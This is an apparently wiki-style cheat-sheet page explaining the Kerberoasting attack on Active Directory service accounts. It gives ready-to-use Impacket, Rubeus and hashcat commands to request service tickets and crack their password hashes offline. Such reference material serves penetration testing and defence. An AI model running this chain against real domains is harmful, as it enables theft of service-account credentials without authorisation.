Kerberoasting
Introduction
Kerberoasting is an attack technique that allows attackers to target service accounts in Active Directory. These service accounts typically have SPNs (Service Principal Names) associated with them.
The attacker is able to request the Service Ticket from the Ticket Granting Server which is encrypted using the SPN's password hash.
The attack is made in few steps:
The attacker sends TGS-REQ request to the Ticket Granting Server.
The attacker gets the Service Ticket in theTGS-REP request
Attacker brute-forces the Service Ticket offline to obtain the user's password.
Performing the attack
Impacket
impacket-GetUserSPNs -request -dc-ip <dc_ip> <domain>/<username>Rubeus
.\Rubeus.exe kerberoast /outfile:<outputfile>Crack
hashcat -m 13100 <hashes_file> <wordlist>Last updated